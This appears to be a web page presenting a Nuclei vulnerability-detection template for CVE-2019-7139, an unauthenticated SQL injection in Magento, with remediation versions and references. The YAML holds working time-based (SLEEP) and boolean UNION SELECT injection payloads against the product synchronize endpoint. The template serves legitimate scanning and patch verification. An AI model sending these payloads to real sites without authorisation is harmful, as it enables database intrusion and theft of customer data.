Magento - SQL Injection

ID: CVE-2019-7139

Severity: critical

Author: MaStErChO

Tags: time-based-sqli,cve,cve2019,sqli,magento

Description

An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage.

YAML Source

id: CVE-2019-7139

info:
  name: Magento - SQL Injection
  author: MaStErChO
  severity: critical
  description: |
    An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage.
  remediation: |
    This issue is fixed in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2.
  reference:
    - https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
    - https://www.ambionics.io/blog/magento-sqli
    - https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13
    - https://github.com/koutto/jok3r-pocs
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7139
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-7139
    cwe-id: CWE-89
    epss-score: 0.00582
    epss-percentile: 0.778
    cpe: cpe:2.3:a:magento:magento:*:*:*:*:open_source:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: magento
    product: magento
    framework: magento
    shodan-query:
      - http.component:"Magento"
      - cpe:"cpe:2.3:a:magento:magento"
      - http.component:"magento"
  tags: time-based-sqli,cve,cve2019,sqli,magento

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "text/x-magento-init")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((8)))a)%3d1+--+- HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    stop-at-first-match: true
    matchers:
      - type: dsl
        name: time-based
        dsl:
          - 'duration_1>=8'
          - 'contains(content_type_1, "application/json")'
        condition: and

      - type: dsl
        name: blind-based
        dsl:
          - 'contains(content_type_2, "application/json") && contains(content_type_3, "application/json")'
          - 'status_code_2 == 200 && status_code_3 == 400'
          - 'len(body_2) == 2 && len(body_3) == 2'
        condition: and
# digest: 4b0a00483046022100eeaf22bda786fca60002b3f2a4921720e83cac9f5fc5c91fa770a55c26664b3a022100b0cfe2317edaa15b499095eebb7a850981c25cbd5ce9d40d05e03baac019d4d9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-7139.yaml"

View on Github